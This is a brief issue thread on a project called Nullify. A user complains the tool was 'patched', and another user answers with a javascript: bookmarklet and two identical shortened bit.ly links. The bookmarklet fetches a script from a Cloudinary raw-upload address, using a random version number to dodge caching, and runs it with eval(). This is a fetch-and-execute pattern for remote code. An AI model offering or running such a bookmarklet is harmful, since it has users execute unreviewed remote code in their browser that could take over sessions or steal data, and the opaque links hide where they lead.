### ISSUE TITLE
E

### ISSUE THREAD

**Issue by censoredgarbage** [sysplu/Nullify#99]
it got patched wont work for me

**Comment by censoredgarbage** [comment]
pls fix

**Comment by baldwinT2010** [comment]
javascript:fetch(https://res.cloudinary.com/plu/raw/upload/v${Math.floor(Math.random() * (999999 - 999) + 999)}/nullify.js).then((res) => res.text().then((t) => eval(t)))

**Comment by baldwinT2010** [comment]
https://bit.ly/rB12_sup

**Comment by baldwinT2010** [comment]
https://bit.ly/rB12_sup
